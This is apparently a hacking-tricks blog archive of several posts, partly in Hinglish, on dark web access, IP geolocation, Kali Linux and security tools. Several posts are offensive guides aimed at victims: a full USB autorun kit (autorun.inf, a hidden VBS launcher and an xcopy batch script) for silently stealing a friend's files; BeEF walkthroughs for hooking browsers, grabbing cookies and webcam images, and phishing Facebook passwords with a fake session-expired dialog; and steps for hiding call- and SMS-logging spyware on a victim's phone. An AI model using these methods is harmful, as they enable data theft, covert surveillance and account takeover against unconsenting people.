Showing posts with label Some thing NeW.... Show all posts
Showing posts with label Some thing NeW.... Show all posts

Tuesday, 18 April 2017

BEST HACKING WEBSITES OF DARK WEB.




How To Access The Deep Web or Darkweb


The deep web is not a single location, but a whole class of different locations which share one thing in common – that they are hidden from search engines and regular internet users. Different areas of the deep web therefore have different requirements for you to be able to access them, and any technology which you use will only give you access to its specific area of the hidden internet. Having said that, there is a very small number of technologies used to create what is popularly called the ‘deep web’ or ‘darknet’, and one in particular which the vast majority of people use – TOR


Best Hacking Websites on The Dark Net : –

The Art of Human Hacking



Strategic Intelligence Network.


SUMXI


Ranting for the Revolution..

Galaxy2

Hack Canada

Dur69

Hack Group

Hidden Answers




Monday, 17 April 2017

How to Access Darknet (darkweb) : The Hidden Anonymous Internet

May be you are aware of the mysterious hidden internet called the 'DarkNet’ (DARK WEB) or ‘Deep Web’ that you can’t access from Google and which lies beyond the reach of most of the people like us. Perhaps you have heard of some Hacker selling credit card information, Online Data leaked of big companies(Ashley Madison,Sony,etc) and variety of these information. Maybe you live in a country where you are not allowed to speak freely… If you don’t know, then we will tell you what it is and how to access Darknet.

What is Dark Web?


First you would need to know about Deep Web. Deep web is 99% of the internet that is not accessible using Google. Deep Web includes large libraries, large databases and members’ only websites that are not available to the general public. If you have a library network in your College campus or database network in your company that only you can get access to, it is DarkWeb.

Darknet is an overlay network that can only be accessed using specific software,configurations,or authorization. It is part of the Deep Web, because its contents are not accessible through search engines. But it is something more, it is anonymous. It hosts anonymous websites. Yeah, you wouldn’t know who the owner is unless he explicitly reveal his information. It offers full anonymity to users too. Darknet anonymity is usually achieved using an ‘onion network’. I am sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has, same happens when you use an onion network. There are numbers of encryption layers that hide your true identity.

Uses of Darkweb:

Ok, so you have grasped what Darkweb is, Now you may ask me why should you use it. Well the reason could be any of them:

1~To better protect the privacy right of citizens from targeted and mass surveillance.
2~Whistleblowing and news leaks
3~Hacking and Computer Crime. (Maybe,you may want to chat with the most dangerous of hackers).
4~Sale of restricted goods.
5~File sharing. etc...

How to Access DARKWEB?


Well the most popular way to access Darknet is by using TOR browser. Technically, it stands for ‘The Onion Router’ and it is as simple as installing a new browser.

After that you would need a URL or directory that contains URLs to different websites or class of websites so that you know what to type in into the browser’s address bar.


You can easily get URLs in Onion Directory of Darweb at http://am4wuhz3zifexz5u.onion/ or just google for Darkweb Sites.
Make sure you use TOR Browser. .Also CLICK here and DOWNLOAD TOR Browser



Just like you have Google,Yahoo,etc for our widely known Internet, Darknet also has a Search Engine. Some are Torch, Duck Duck Go,etc...

If you want to access Darknet from your pretty PHONE, you can use ORBOT(Free).


I think you wanna explore Darknet yourself, So i would leave you here. Just a piece of advice, it is used for all things legal or illegal. So just make sure you verify the links you click.

NOTE: Access Darknet with your own risk. Darknet is filled with legal as well as illegal contents. Hence make sure that you don’t click or access any illegal content. If you are facing any problems, then comment below.

Sunday, 16 April 2017

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)







Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.


STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines



@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls



Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.


STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs


This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4


Open Notepad one last time and copy-paste the following line.



wscript.exe \invisible.vbs file.bat



Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.












Friday, 3 March 2017

How to Hack Web Browsers with BeEF...through Kali Linux









Welcome back to MyAiM's Hacker...




I had promised new series on hacking web applications, mobile devices, and even Facebook here on AiM Trick's and I intend to deliver you those sometime this year. In each of those topics, I will introduce you to new hacking tools and techniques, though, one tool that we will be using in all of those areas is called the Browser Exploitation Framework , or BeEF (don't ask me what the lowercase "e" stands for).

Similar to Metasploit , BeEF is a framework for launching attacks. Unlike Metasploit, it is specific to launching attacks against web browsers. In some cases, we will be able to use BeEF in conjunction with Metasploit to launch particular attacks, so I think its time for us to become familiar with it.


BeEF was developed by a group of developers led by WADE ALCORN. Built on the familiar Ruby on Rails platform, BeEF was developed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

STEP=>1





*Start Cooking BeEF




BeEF is built into Kali Linux , and it can be started as a service and accessed via a web browser on your localhost. So let's start by firing up Kali and cooking a bit of BeEF. Start the BeEF service by going to "Applications" -> "Kali Linux" -> "System Services" -> "BeEF" -> "beef start."



STEP=>2




*Opening a Browser to BeEF



The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:


http://localhost:3000/ui/authentication



The default credentials are "beef" for both username and password.





Great! Now you have successfully logged into BeEF and are ready to begin using this powerful platform to hack web browsers.

Note that in the screenshot below that my local browser, 127.0.0.1, appears in the left hand "Hooked Browsers" explorer after I clicked on the link to the demo page. BeEF also displays its "Getting Started" window to the right.


STEP=>3



*Viewing Browser Details



If I click on the local browser, it will provide with more choices to the right including a "Details" window where we can get all the particulars of that browser. Since I am using the Iceweasel browser built into Kali, which is built upon Firefox, it shows me that the browser is Firefox.

It also shows me the version number (24), the platform (Linux i686), any components (Flash, web sockets, etc.), and more information that we will be able to use in later web application hacks.


STEP=>4



*Hooking a Browser




The key to success with BeEF is to "hook" a browser. This basically means that we need the victim to visit a vulnerable web app. This injected code in the "hooked" browser then responds to commands from the BeEF server. From there, we can do a number of malicious things on the victim's computer.

BeEF has a JavaScript file called "hook.js," and if we can get the victim to execute it in a vulnerable web app, we will hook their browser! In future tutorials, we will look at multiple ways to get the victim's browser hooked.

In the screenshot below, I have "hooked" an Internet Explorer 6 browser on an old Windows XP on my LAN at IP 192.168.89.191.




STEP=>5




*Running Commands in the Browser




Now, that we have hooked the victim's browser, we can use numerous built-in commands that can executed from the victim's browser. Below are just a few examples; there are many others.

☣Get Visited Domains
☣Get Visited URLs
☣Webcam
☣Get All Cookies
☣Grab Google Contacts
☣Screenshot

In the screenshot below, I selected the "Webcam" command that many of you may be interested in. As you can see, when I execute this command, an Adobe Flash dialog box will pop up on the screen of the user asking, "Allow Webcam?" If they click "Allow," it will begin to return pictures from the victim's machine to you.

Of course, the text can be customized, so be imaginative. For instance, you could customize the button to say "You have just won the lottery! Click here to collect your winnings!" or "Your software is out of date. Click here to update and keep your computer secure." Other such messages might entice the victim to click on the box.



STEP=>6



*Getting Cookies



Once we have the browser hooked, there is almost unlimited possibilities of what we can do. If we wanted the cookies of the victim, we can go to "Chrome Extensions" and select "Get All Cookies" as shown in the screenshot below.




When we click on the "Execute" button to the bottom right, it will begin collecting all the cookies from the browser. Obviously, once you have the user's cookies, you are likely to have access to their websites as well.


BeEF is an extraordinary and powerful tool for exploiting web browsers. In addition to what I have shown you here, it can also be used to leverage operating system attacks. We will be using it and other tools in my new series on hacking web applications, mobile devices, and Facebook,.


so keep coming back to AiM Trick's...








Sunday, 26 February 2017

How to Find the Exact Location of Any IP Address










Welcome back to MyAiM's Hacker !



Have you ever wondered where the physical location of an IP address is? Maybe you want to know if that proxy server you are using is actually out of your local legal jurisdiction. Or, maybe you have the IP address of someone you are corresponding with and want to make certain they are where they say they are. Or, maybe you are a forensic investigator tracking down a suspect who wrote a threatening email or hacked someone's company.


Now you can find the location of that IP address without a subpoena or search warrant.


A company calledMAXMIND maintains a database of the location of every IP address on the planet complete with GPS coordinates, area code, zip code, and country.

This database is not in a typical relational database format, but rather in a flat file. MaxMind charges a $370 site license and $90/month (or $1360/year) for updates to this database. Their software has a beautiful front end that makes querying the database easy enough that even Windows or Mac users can manage.

MaxMind also gives away a free developers version of this database without any software or tools to read it. Although slightly less accurate than the commercial version, the price is certainly right. All we need to find the location of the IP is a program to read this data.


Two programmers, Jennifer Ennis and T. Williams, have developed a small Python script called pygeoip and released it under the GPL license that enables us to input an IP address and output this critical information.


STEP=>1




Fire Up Kali & Open a Terminal



The first step, of course, is to fire up our our trusty
Kali system, or in this case, any Linux distribution . Then, open a terminal.


Note: Be cautious of the formatting below for commands. The formatting of this article will create big space gaps since it stretches lines out to fit the margins. This is because of long URLs that try to fit themselves on a separate line. Large spaces equals just one space, so keep that in mind. Refer to the screenshots to see how they actually look.


STEP=>2




Download the Database


Now we need to download the database from MaxMind, and we can get it by typing the following.


kali > wget -N -q
http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz






Then we need to unzip it.


kali> gzip -d GeoLiteCity.dat.gz





Let's now check that the database is in place by listing the directory.


kali > ls -alh GeoLiteCity.dat



STEP=>3




Download & Install Pygeoip


Next, we need to install the Python script to read the database, pygeoip. We can download it by typing the following.


kali > wget http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip







Then, unzip it.

kali > unzip pygeoip-0.1.3.zip




We next need to download some setup tools into the pygeoip directory.

kali > cd /pygeoip-0.1.3


kali > wget http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py



kali > wget http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg




Let's now move and then build and install the setup tools.

kali > mv setuptools-0.6c11-py2.5.egg setuptools-0.7a1-py2.5.egg


kali > python setup.py build

kali > python setup.py install



We need to move the database to the pygeoip directory so that script can access it without having to use the full path.

kali > mv GeoLiteCity.dat /pygeoip-0.1.3/GeoLiteCity.dat



STEP=>4



Query the Database


Now that we have the database in place and the pygeoip script downloaded and installed, we can begin to query that database with pygeoip.

First, we need to start a Python shell.

kali > python

Then, you will be greeted will the triple >>> indicating you are now in an interactive python shell. Let's import the module and instantiate the class.

>>>import pygeoip

>>>gip =

pygeopip.GeoIP('GeoLiteCity.dat')
Next, we are ready to begin our query. Let's see where Google is located.

>>>rec =

gip.record_by_addr('64.233.161.99')

>>>for key.val in rec.items():

... print "%s: %s" %(key,val)

...


Please note that it is critical to indent the "print". If not, you will throw an error.

As you can see, we were able to locate Google's IP in Mountain View, CA at area code 650, postal code 94043, longitude -122.0574, and latitude 37.4192. Not bad! Now, let's try to locate the IP of cnn.com.






Once again, the combination of the database and pygeoip script was able to provide us with key location information on CNN's IP address.


This little tool is great for locating any IP address in the world, albeit, it is a bit clunky. Maybe someone here in the Null Byte community with good Python skills would like to write an interactive script with a nice user interface where the user can simply enter the IP and get the record information?


Keep coming back to MyAiM's Community, as we continue to explore the tools and techniques of hacking!






Sunday, 19 February 2017

How to Get Facebook Credentials Without Hacking Facebook


Welcome back to AiM TrIcK$







Many people come to Aim Tricks looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills , and skill development is what AiM Tricks is all about.


Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux , this won't work for you—but if you are willing to take a little time to study here at AiM Tricks , you can probably gain access to someone's Facebook credentials very easily with this little trick.



STEP>1





INSTALL KALI LINUX IN YOUR PC






The first step is to download and install Kali Linux . This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system .

Within Kali, there is an app called the Browser Exploitation Framework (BeEF) . It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook
credentials, which I'll show you here.







STEP>2




OPEN BEEF




Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.






When you click on it, it starts BeEF by opening a terminal.




BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.



You will then by greeted by BeEF's "Getting Started" screen.








STEP>3


HOOK THE VICTIM'S BROWSER






This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.


The simplest way is to simply embed the code into your website and entice the user to click on it. use your imagination.


The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)










From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.





STEP>4





SEND A DIALOG BOX TO THE USER






When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.

If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the 'Commands" tab.











Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.


This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.







If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type,then click on the "Execute" button the the bottom.










STEP>5





THE DIALOG BOX APPEARS ON THE TARGET SYSTEM





When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.








Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.





STEP>6




HARVEST THE CREDENTIALS





Back on our system in the BeEf interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.






If you are really determined to get those Facebook credentials, it can be most definitely be done, and this is just one way of many methods (but probably the simplest).
If you you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!











Saturday, 4 February 2017

HOW TO INSTALL KALI LINUX IN ANDROID




Hello Friends !



In this post i am going to tech you how to install Kali Linux on android smartphone easily without any complicated steps and hassle.


Step 1: You have to make sure that your phone is rooted properly without any issues, if its not then its the time to root your device.

Step 2: Now download two applications from Google Play Store Linux Deploy & Vnc Viewer as shown below from the given link





























Step 3: Now Open Linux Deploy and tap that download button as shown in the picture,




Step 4: Now Select Distribution as Kali Linux and Go Back




Step 5: Now Tap on Three Dots on top right corner and Tap Install, it will take some time because your phone is going to download an image of kali linux (2GB Approx.) after that just hit start on the main screen and minimize the app.


Step 6: Open vnc viewer and configure it my typing the password and name (get password from your linux deploy’s settings and use any name eg. kali)








Now tap Connect and Enjoy your kali linux

Saturday, 24 December 2016

Free and Full SPY Software....record full android phone of your victim ...






Hii guesss.....i m Back With a new an wonderfull trick .


Dosto aj mai apko ek aisy trick ky baray mey batany ja rha hu jo hacking ky duniya mey bahot he jyda usefull h



Agar ap es App ko use krty ho to ap apny app ko 50% hacker bol sakty ho


Dosto a ek aisa App h jo pura android phone record krky apko email krdyga .





Es App ky kuch khass battey {features}


1.Logging all phone calls made and received including deleted records.

2.Logging all text messages sent and received including deleted records.

3. Logging application usage details.

4.Live location tracking.

5.Hide app option available.

6.Online control panel.

7.Locations visited report with street address.

8.Geofencing alerts when the phone travels beyond a certain distance

9.Email alerts when your phone SIM card is changed



.....A App free n payable dono h.....



****App ko use kisy kray... { How to use it }


##Download Free Call and Sms Tracker in your Victim's Android by the given link





##Fulfill the details by giving name, Email ( apna email jispy ap victiom ke record recieve krna chaty ho)


##Set the time ( Time set krdoo ke ap record kon sy tim mey recieve krna chaty ho , o v daily ya fir weekly)




es App ky icone ko ap gyab kr sakty ho jo ke victim ky phone py show nae kryga or usko pta nae chalyga ke o record ho rha h.


If u want it premium then u have to open it by browser and login in this app and click on Forget password and do it ...


Note=This is only for educational purpose.
M not responsibe if any illigle work is done by you..


SOOO NOW ENJOY and SPY ( record ) your target with Full Details ....













Sunday, 18 December 2016

See World on your Android phone Live...Freeee World tour



Hii gyesss... m Back With new n usefull trick.


Dosto aj mai apko kuch aisa batany ja rha hu jo apky lea bahot lavdyak h


dosto apsub log duniya ghumna chaty ho , duniya ky unique places ko dekhna chaty ho jisay ke india ke Taj Mahel, Red Fort,
,Nepal ke Lumbini , Paris ke Efel Tower, America ke White house, kese v ocean py Ireland , great wall of china, etc etc .


but dosto apny kaam ke wajsy sy, bzy life ke wajsy sy ap ghum nae paty or apke iccha adhuri reh jate h...



so dosto aub apko chinta lyny ke jarurat nae h , aj mai apko kuch aisa btaunga jiscay ap apny ghar py baith ky puri duniys ghum sakty ho .




agr apky pass ek android phone hai to ap puri duniya apny android phone sy ghum sakty ho o v bilkul FREEEEE.



.....So Lets Start.....


@ Download GOOGLE STREET VIEW app from your play store or by given link





@ Open the app , app open krty he apko world ka map dekhy ga with red dots🔴



@ ap waha py srarch box mey kese v place ko search kr sakty ho like Taj Mahal ...



@ Fir ap apny search place ko zoom kro or red dot py click kroo



@ fir waha py apko kuch option milyga ,
1- Featured
2- Explore




@ Dosto agar ap Explore py click krty ho to apky search place ko 3D mey dekhyagya ga o v Live ,



but agr ap Featured py click krty ho to ap search place ko pura dekh sakty ho kona kona - left- right ghum ghum ky o v live



So dosto download given app and start your world tour without any cost.



I 
        HOPE
                     YOU 
                              WILL
                                         ENJOY
                                                      MY
                                                             TRICKS

Wednesday, 28 September 2016

Top Best Free Hacking Tools for all time






picsart-09-28-03-15-32.jpg

There are lots of hacking tools are available on the internet. But many of those hacking tools are the virus and some are fake. So, how will you find top best free hacking tools for computer/PC and for android or iphone? I was also searching for top best free hacking tools because I also have much interest in this field, so here I’m sharing the top best hacking tools 2017 :








Best hacking tools 2017

1. Nmap

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free,open source and free hacking tool.

Click on Download button for Nmap

download-link.jpg

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations worldwide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Click on Download button for Nessus Remote Security Scanner

download-link.jpg

3. John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypts(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

Click on Download button for John the ripper

download-link.jpg

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on HTTP fingerprinting or Google hacking/info gathering etc, another article for just those).

Click on Download button for Nikto

download-link.jpg

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for Nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Click on Download button for Superscan

download-link.jpg

6. p0f







P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

– machines that connect to your box (SYN mode),

– machines you connect to (SYN+ACK mode),

– the machine you cannot connect to (RST+ mode),

– machines whose communications you can observe.

Basically, it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Click on Download button for p0f

download-link.jpg

7. Wireshark

Wireshark is one of best hacking tool a GTK+-based network protocol analyzer wifi hacking tool, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! and is the best wifi hacking tool?

Click on Download button for Wireshark

download-link.jpg

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP). The best Layer 2 kit there is.

Click on Download button for Yersinia

download-link.jpg

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Click on Download button for Eraser

download-link.jpg

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with a XTerm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Click on Download button for PuTTY

NOTE : All these above posted tools are shared only for educational purpose and for pen testing. Tech Arena does not promote any kind of hacking and illegal stuff.

So, these are the top best hacking tools 2016 for computer/PC. These tools are a must for every hacker. If you are a newbie then you can search for their tutorial on the internet. So, I hope this helped you a lot, if you know some other best hacking tools then let me know in comments. Feel free to share it with your friends !!







Featured post

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...